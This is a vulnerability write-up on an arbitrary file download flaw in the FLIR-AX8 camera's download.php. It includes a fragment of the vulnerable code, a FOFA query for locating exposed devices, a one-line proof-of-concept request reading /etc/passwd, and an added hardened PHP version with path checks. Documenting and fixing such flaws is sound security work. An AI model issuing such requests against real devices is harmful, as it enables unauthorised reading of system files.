# FLIR-AX8 download.php Arbitrary File Download
## Vulnerability Description
The download.php file in FLIR-AX8 does not adequately filter its input, resulting in an arbitrary file download vulnerability.
## Affected Products
> FLIR-AX8
## FOFA
> app="FLIR-FLIR-AX8"
## Reproduction
The vulnerable file is **download.php**
```php
        "application/octet-stream",
        "zip" => "application/zip",
        "mp3" => "audio/mpeg",
        "mpg" => "video/mpeg",
        "avi" => "video/x-msvideo",
    );
    $ctype = isset($content_types[$file_ext]) ? $content_types[$file_ext] : $ctype_default;
    header("Content-Type: " . $ctype);
    //check if http_range is sent by browser (or download manager)
    if(isset($_SERVER['HTTP_RANGE']))
    {
        list($size_unit, $range_orig) = explode('=', $_SERVER['HTTP_RANGE'], 2);
        if ($size_unit == 'bytes')
        {
            //multiple ranges could be specified at the same time, but for simplicity only serve the first range
            //http://tools.ietf.org/id/draft-ietf-http-range-retrieval-00.txt
            list($range, $extra_ranges) = explode(',', $range_orig, 2);
        }
        else
        {
            $range = '';
            header('HTTP/1.1 416 Requested Range Not Satisfiable');
            exit;
        }
    }
    else
    {
        $range = '';
    }
    //figure out download piece from range (if set)
    list($seek_start, $seek_end) = explode('-', $range, 2);
    ob_clean();
    //set start and end based on range (if set), else set defaults
    //also check for invalid ranges.
    $seek_end = (empty($seek_end)) ? ($file_size - 1) : min(abs(intval($seek_end)), ($file_size - 1));
    $seek_start = (empty($seek_start) || $seek_end < abs(intval($seek_start))) ? 0 : max(abs(intval($seek_start)), 0);
    //Only send partial content header if downloading a piece of the file (IE workaround)
    if ($seek_start > 0 || $seek_end < ($file_size - 1))
    {
        header('HTTP/1.1 206 Partial Content');
        header('Content-Range: bytes ' . $seek_start . '-' . $seek_end . '/' . $file_size);
        header('Content-Length: ' . ($seek_end - $seek_start + 1));
    }
    else
        header("Content-Length: $file_size");
    header('Accept-Ranges: bytes');
    set_time_limit(0);
    fseek($file, $seek_start);
    while(!feof($file))
    {
        print(@fread($file, 1024*8));
        ob_flush();
        flush();
        if (connection_status() != 0)
        {
            @fclose($file);
            exit;
        }
    } // file save was a success
    @fclose($file);
    exit;
}
else
{
    // file couldn't be opened
    header("HTTP/1.0 500 Internal Server Error");
    exit;
}
}
else
{
    // file does not exist
    header("HTTP/1.0 404 Not Found");
    exit;
}
?>
```
A quick review shows that the `file` parameter is user-controlled and never filtered, so any file readable by the web server can be downloaded:
```
/download.php?file=/etc/passwd
```
![fl-1](/static/qingy/FLIR-AX8_download.php_任意文件下载/img/fl-1.png)
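For comparison, the following is an added hardened version of the path handling (not the vendor's download.php): the `file` parameter is resolved with `realpath()` inside a fixed directory, symlinks and `..` are rejected by the prefix check, and only allowlisted extensions are served. The base directory `/var/www/downloads` and the extension list are assumptions for this example.

```php
<?php
// Added hardening example, not the vendor's code. The base directory and the
// extension allowlist are assumed values for illustration.
const DOWNLOAD_BASE = '/var/www/downloads';                // assumed download directory
const ALLOWED_EXT   = ['zip', 'mp3', 'mpg', 'avi', 'jpg']; // assumed allowlist

/**
 * Return the canonical path of $requested inside $baseDir, or null when the
 * request escapes the directory, is not a regular file, or has a disallowed extension.
 */
function resolve_download_path(string $baseDir, string $requested): ?string
{
    // Fail fast on absolute paths, NUL bytes and ".." components; the realpath()
    // prefix check below is the authoritative test.
    if ($requested === '' || $requested[0] === '/' || strpos($requested, "\0") !== false
        || preg_match('#(^|/)\.\.(/|$)#', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested);
    // realpath() resolves symlinks, so a link inside the directory that points at
    // /etc/passwd also fails the prefix comparison.
    if ($base === false || $path === false || !is_file($path)
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $path : null;
}

$requested = $_GET['file'] ?? '';
$path = is_string($requested) ? resolve_download_path(DOWNLOAD_BASE, $requested) : null;
if ($path === null) {
    // Do not tell the client which check failed; record it server-side for detection.
    error_log('download.php: rejected file parameter from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
    header('HTTP/1.1 400 Bad Request');
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

Requests such as `file=/etc/passwd` or `file=../../etc/passwd` are rejected before any file is opened, and the rejection is logged so repeated attempts can be alerted on.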